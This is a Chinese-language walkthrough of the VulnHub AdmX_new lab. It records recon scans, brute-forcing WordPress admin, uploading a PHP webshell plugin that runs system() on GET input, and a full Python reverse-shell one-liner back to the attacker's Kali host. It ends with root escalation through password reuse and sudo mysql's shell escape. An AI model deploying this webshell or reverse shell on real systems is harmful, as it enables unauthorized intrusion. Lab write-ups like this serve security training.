实验主机:攻击机kali(192.168.109.131)
靶机AdmX_new(192.168.109.134)
实验目标:获取root权限 + 2 flag
实验网络:NAT
靶机下载地址:https://download.vulnhub.com/admx/AdmX_new.7z
一:信息收集
步骤一:确定靶机IP地址
arp-scan -l
步骤二:探测靶机开放端口
nmap -T4 -sV -O -p- -Pn 192.168.109.134
都没什么有价值的信息
步骤三:使用DirSearch目录扫描
#项目地址 https://github.com/maurosoria/dirsearch python dirsearch.py -u "http://192.168.109.134/" -t 5
访问页面看到页面持续加载 抓包进行分析
可以看到在第一个请求的响应体里有多个 192.168.159.145 地址,下面的请求都是从第一个请求的响应体里发出,但由于请求不成功才导致页面的卡顿。尝试让页面加载时的请求全部指向本机
二:漏洞探测及利用
- 进入Options进行替换,然后放包页面加载
- 接着访问http://192.168.109.134/wordpress/wp-login.php
- 尝试进行弱口令登录
根据报错提示可得知账户名为admin 进行爆破
- 成功爆破出密码为 adam14
- 生成shell.php 并压缩为shell.zip进行上传
<?php /** * Plugin Name:Webshell * Plugin URI:https//yuanfh.github.io * Description:WP Webshell for Pentest * Version:1.0 * Author:yuanfh * Author URI:https://yuanfh.github.io * License:https://yuanfh.github.io */ if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>
6.对上传的插件木马进行访问路径为
/wordpress/wp-admin/plugins/shell.php?cmd=id
- python反弹shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.109.131",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn(["/bin/bash"])' kali# nc -lvvp 4444 //开启监听
三:密码重用/MySQL提权
步骤一:
cd / ls cd hoem ls cd wpadmin su wpadmin //密码为adam14成功切换
成功拿到第一条flag
步骤二:二次提权
发现wpadmin可以以root身份执行mysql操作
1、sudo /usr/bin/mysql -u root -D wordpress -p #密码adam14 2、\! /bin/bash #切换到 root 权限的命令行 cd / whoami
成功拿到第二条flag
over...